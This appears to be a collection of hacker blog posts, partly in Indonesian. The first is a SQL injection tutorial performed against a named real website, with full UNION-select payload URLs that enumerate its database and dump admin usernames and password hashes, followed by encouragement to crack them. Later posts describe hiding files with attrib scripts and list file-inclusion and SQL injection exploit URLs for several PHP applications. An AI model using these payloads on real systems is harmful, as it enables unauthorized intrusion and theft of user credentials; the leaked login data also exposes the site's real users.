[x]
otree kemaren kita udah belajar gimana "Mendeteksi SQL Injection Vulnerability"
sekarang gw bakal buat tutor gimana ngeluarin table, column dan informasi yang ada didalamnya
[x]
contoh target kita kali ini dari dalam negeri ajah ya... :)
http://www.solusisehat.net/berita.php?id=227
keluarin magic numbernya
http://www.solusisehat.net/berita.php?id=-227 union select 1,2,3,4,5,6,7--
angka2 yang keluar adalah 2, 3 dan 5 <-- thats our magic number sekarang coba kita liat versi, database dan user dari target http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,version(),database(),4,user(),6,7-- nah udah keliatankan versi, nama database sama usernya? ternyata versi 5 euy... :) sekarang kita liat table2 yang ada didalam databasenya disini gw make command information_schema untuk ngeluarin table sama columnnya. http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(table_name),database(),4,user(),6,7%20from%20information_schema.tables%20where%20table_schema=database()-- command yang gw pake untuk ngeluarin table adalah group_concat(table_name) from information_schema.tables where table_schema=database() masukkan command group_concat(table_name) pada salah satu angka yang udah dikeluarin sebelumnya kemudian command from information_schema.tables where table_schema=database() pada akhir angkanya nah keliatan semua table yang ada dalam databasenya kan? disini kita hanya akan mencari loginnya ajah ya... diantara table2 yang keluar disitu ada table ssc_user, kita akan ngeluarin column yang ada didalam table ssc_user sebelumnya kita konvert table ssc_user menjadi hexa dulu 7373635f75736572 http://www.paulschou.com/tools/xlate/ <-- konvertnya disini
lalu kita keluarin columnnya
http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(column_name),database(),4,user(),6,7%20from%20information_schema.columns%20where%20table_name=0x7373635f75736572--
command yang gw pake untuk ngeluarin column adalah group_concat(column_name) from information_schema.columns where table_name=[nama table]
[nama table] disini adalah ssc_user yang sudah kita konvert menjadi hexa yaitu 7373635f75736572
group_concat(column_name) from information_schema.columns where table_name=0x7373635f75736572
nah disini kita bisa liat column yang ada dalam table ssc_user
sekarang kita akan ngeluarin informasi dari column nama_login dan sandi
http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(nama_login,0x3a,sandi),3,4,5,6,%207%20from%20ssc_user--
admin:2fbd2ef919d06770,ginung:2350538419934368,Ardi:0f5219dc11e0f77a,yesi:7b10fc7008fadabc,noviana:533e8d92566a1adc
sekarang keliatan semua informasi yang ada dalam column nama_login dan sandi kan?
tinggal dicrack ajah deh xixixi.. :)
[x]
google.com
greetz MainHack BrotherHood
[x]
[x]
how to hidden files or folders in windows without using any software?
maybe this is an old trick but still good and works :)
this trick will keep your files and folders hidden even you have choose option "show hidden files and folders" in "folder option" :p
tested on windows xp and windows vista home premium
[x]
first write this script and save as open.bat
attrib -a -s -h [ folder or file to hidden ]
attrib -a -s -h open.bat
attrib -a -s -h close.bat
second write this script and save as close.bat
attrib +a +s +h [ folder or file to hidden ]
attrib +a +s +h open.bat
attrib +a +s +h close.bat
[x]
script explaination
attrib : displays or changes file attributes
a : archive file attribute
s : system file attribute
h : hidden file attribute
+ : sets an attribute
- : clears an attribute
attrib +a +s +h [ folder or file to hidden ]
you can put your files or folders name there
if you hidden a file dont forget to write down the file extention to
example
attrib +a +s +h pic.jpg <== hidden file name
attrib +a +s +h folderz <== hidden folder name
what about this two files?
attrib +a +s +h open.bat <== hidden open.bat
attrib +a +s +h close.bat <== hidden close.bat
attrib -a -s -h open.bat <== show open.bat
attrib -a -s -h close.bat <== show close.bat
why we put this two files into the script to?
we must hidden this files to or anyone will open your hidden stuff
if you have many folder to hide you can add into the script like this
add this into close.bat
attrib +a +s +h folder1
attrib +a +s +h folder2
attrib +a +s +h folder3
dont forget to add into open.bat to
attrib -a -s -h folder1
attrib -a -s -h folder2
attrib -a -s -h folder3
[x]
how to show it again?
you must have WINRAR to show your hidden stuff
open WINRAR and go to folder or drive where you hidden your stuff
WINRAR will show all hidden files or folders include open.bat and close.bat
click open.bat to show all your hidden stuff
./NoGe
gw kena malaria lagi. hikz..
mo bangun dari tempat tidur ajah rasanya berad amit.
badan-badan gw sakit smua kek mo patah ditambah headache pulak.
duh lengkaplah sudah kisah ini. lolz
walhasil hampir seminggu tepar dirumah. :(
[o] Aperto Blog 0.1.1 Local File Inclusion and SQL Injection VulnerabilitiesRead More...
Software : Aperto Blog version 0.1.1
Vendor : http://code.google.com/p/apertoblog/
Download : http://code.google.com/p/apertoblog/downloads/list
Author : NoGe
[o] Vulnerable file
admin.php
if(isset($_GET['action'])) {
if($_GET['action']=="logout") {
session_destroy();
go('index.php');
} else {
if(file_exists($_GET['action'].".php")) {
include($_GET['action'].".php");
} else {
echo "404";
index.php
if(!$_GET['get']) {
$articles = mysql_query("SELECT * FROM articles ORDER BY id DESC LIMIT 10");
while($row = mysql_fetch_array($articles)) {
showarticle($row, $settings[5]);
}
} elseif(file_exists($_GET['get'].".php")) {
include($_GET['get'].".php");
} else {
echo "404";
categories.php
if(isset($_GET['id'])) {
$cid = $_GET['id'];
//Load category info
$getcat = mysql_query("SELECT * FROM categories WHERE id='$cid'");
[o] Exploit
[ Local File Inclusion ]
http://localhost/[path]/admin.php?action=[LFI]
http://localhost/[path]/index.php?get=[LFI]
[ SQL Injection ]
http://localhost/[path]/categories.php?id=[SQL]
[o] Dork
no d0rk coz it still BETA version. :(
[o] lcxBBportal 0.1 Alpha 2 Remote File Inclusion VulnerabilityRead More...
Software : lcxBBportal version 0.1 Alpha 2
Vendor : http://code.google.com/p/lcxbbportal/
Download : http://code.google.com/p/lcxbbportal/downloads/list/lcxbbportal-0.1.A2.tar.gz
Author : NoGe
[o] Vulnerable file
portal/includes/portal_block.php
include($phpbb_root_path . 'includes/bbcode.' . $phpEx);
includes/acp/acp_lcxbbportal.php
$phpbb_portal_path = $phpbb_root_path . 'portal/';
require_once($phpbb_portal_path . 'includes/portal_block.' . $phpEx);
require_once($phpbb_portal_path . 'includes/adm_portal_block.' . $phpEx);
include($phpbb_root_path . 'includes/functions_display.' . $phpEx);
[o] Exploit
http://localhost/[path]/portal/includes/portal_block.php?phpbb_root_path=[evilcode]
http://localhost/[path]/includes/acp/acp_lcxbbportal.php?phpbb_root_path=[evilcode]
[o] Multi SEO phpBB 1.1.0 Remote File Inclusion VulnerabilityRead More...
Software : Multi SEO phpBB version 1.1.0
Vendor : http://www.phpbb-seo.de/
Download : http://www.phpbb-seo.de/downloads/multi.html
Author : NoGe
[o] Vulnerable file
include/global.php
include_once ($pfad . 'include/config.php');
[o] Exploit
http://localhost/[path]/include/global.php?pfad=[evilcode]
[o] Broadcast Machine 0.1 Multiple Remote File Inclusion VulnerabilityRead More...
Software : Broadcast Machine version 0.1
Vendor : http://code.google.com/p/broadcastmachine/
View Source : https://svn.participatoryculture.org/svn/dtv/trunk/bmachine2/
Author : NoGe
[o] Vulnerable file
all file below is affected by "baseDir" parameter
controllers/MySQLController.php
controllers/SQLController.php
controllers/SetupController.php
controllers/VideoController.php
controllers/ViewController.php
[o] Exploit
http://localhost/[path]/controllers/MySQLController.php?baseDir=[evilcode]
http://localhost/[path]/controllers/SQLController.php?baseDir=[evilcode]
http://localhost/[path]/controllers/SetupController.php?baseDir=[evilcode]
http://localhost/[path]/controllers/VideoController.php?baseDir=[evilcode]
http://localhost/[path]/controllers/ViewController.php?baseDir=[evilcode]
